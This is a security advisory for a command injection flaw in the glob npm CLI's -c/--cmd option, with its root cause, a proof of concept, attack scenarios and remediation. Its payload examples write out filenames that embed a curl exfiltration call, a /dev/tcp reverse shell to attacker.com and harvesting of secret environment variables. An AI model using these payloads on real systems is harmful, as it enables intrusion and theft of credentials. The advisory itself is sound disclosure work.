CVE-2025-64756: glob CLI: Command injection via -c/--cmd executes matches with shell:true

### Summary The glob CLI contains a command injection vulnerability in its `-c/--cmd` option that allows arbitrary command execution when processing files with malicious names. When `glob -c <command> <patterns>` is used, matched filenames are passed to a shell with `shell: true`, enabling shell metacharacters in filenames to trigger command injection and achieve arbitrary code execution under the user or CI account privileges. ### Details **Root Cause:** The vulnerability exists in `src/bin.mts:277` where the CLI collects glob matches and executes the supplied command using `foregroundChild()` with `shell: true`: ```javascript stream.on('end', () => foregroundChild(cmd, matches, { shell: true })) ``` **Technical Flow:** 1. User runs `glob -c <command> <pattern>` 2. CLI finds files matching the pattern 3. Matched filenames are collected into an array 4. Command is executed with matched filenames as arguments using `shell: true` 5. Shell interprets metacharacters in filenames as command syntax 6. Malicious filenames execute arbitrary commands **Affected Component:** - **CLI Only:** The vulnerability affects only the command-line interface - **Library Safe:** The core glob library API (`glob()`, `globSync()`, streams/iterators) is not affected - **Shell Dependency:** Exploitation requires shell metacharacter support (primarily POSIX systems) **Attack Surface:** - Files with names containing shell metacharacters: `$()`, backticks, `;`, `&`, `|`, etc. - Any directory where attackers can control filenames (PR branches, archives, user uploads) - CI/CD pipelines using `glob -c` on untrusted content ### PoC **Setup Malicious File:** ```bash mkdir test_directory && cd test_directory # Create file with command injection payload in filename touch '$(touch injected_poc)' ``` **Trigger Vulnerability:** ```bash # Run glob CLI with -c option node /path/to/glob/dist/esm/bin.mjs -c echo "**/*" ``` **Result:** - The echo command executes normally - **Additionally:** The `$(touch injected_poc)` in the filename is evaluated by the shell - A new file `injected_poc` is created, proving command execution - Any command can be injected this way with full user privileges **Advanced Payload Examples:** **Data Exfiltration:** ```bash # Filename: $(curl -X POST https://attacker.com/exfil -d "$(whoami):$(pwd)" > /dev/null 2>&1) touch '$(curl -X POST https://attacker.com/exfil -d "$(whoami):$(pwd)" > /dev/null 2>&1)' ``` **Reverse Shell:** ```bash # Filename: $(bash -i >& /dev/tcp/attacker.com/4444 0>&1) touch '$(bash -i >& /dev/tcp/attacker.com/4444 0>&1)' ``` **Environment Variable Harvesting:** ```bash # Filename: $(env | grep -E "(TOKEN|KEY|SECRET)" > /tmp/secrets.txt) touch '$(env | grep -E "(TOKEN|KEY|SECRET)" > /tmp/secrets.txt)' ``` ### Impact **Arbitrary Command Execution:** - Commands execute with full privileges of the user running glob CLI - No privilege escalation required - runs as current user - Access to environment variables, file system, and network **Real-World Attack Scenarios:** **1. CI/CD Pipeline Compromise:** - Malicious PR adds files with crafted names to repository - CI pipeline uses `glob -c` to process files (linting, testing, deployment) - Commands execute in CI environment with build secrets and deployment credentials - Potential for supply chain compromise through artifact tampering **2. Developer Workstation Attack:** - Developer clones repository or extracts archive containing malicious filenames - Local build scripts use `glob -c` for file processing - Developer machine compromise with access to SSH keys, tokens, local services **3. Automated Processing Systems:** - Services using glob CLI to process uploaded files or external content - File uploads with malicious names trigger command execution - Server-side compromise with potential for lateral movement **4. Supply Chain Poisoning:** - Malicious packages or themes include files with crafted names - Build processes using glob CLI automatically process these files - Wide distribution of compromise through package ecosystems **Platform-Specific Risks:** - **POSIX/Linux/macOS:** High risk due to flexible filename characters and shell parsing - **Windows:** Lower risk due to filename restrictions, but vulnerability persists with PowerShell, Git Bash, WSL - **Mixed Environments:** CI systems often use Linux containers regardless of developer platform ### Affected Products - **Ecosystem:** npm - **Package name:** glob - **Component:** CLI only (`src/bin.mts`) - **Affected versions:** v10.2.0 through v11.0.3 (and likely later versions until patched) - **Introduced:** v10.2.0 (first release with CLI containing `-c/--cmd` option) - **Patched versions:** 11.1.0and 10.5.0 **Scope Limitation:** - **Library API Not Affected:** Core glob functions (`glob()`, `globSync()`, async iterators) are safe - **CLI-Specific:** Only the command-line interface with `-c/--cmd` option is vulnerable ### Remediation - Upgrade to `glob@10.5.0`, `glob@11.1.0`, or higher, as soon as possible. - If any `glob` CLI actions fail, then convert commands containing positional arguments, to use the `--cmd-arg`/`-g` option instead. - As a last resort, use `--shell` to maintain `shell:true` behavior until glob v12, but take care to ensure that no untrusted contents can possibly be encountered in the file path results.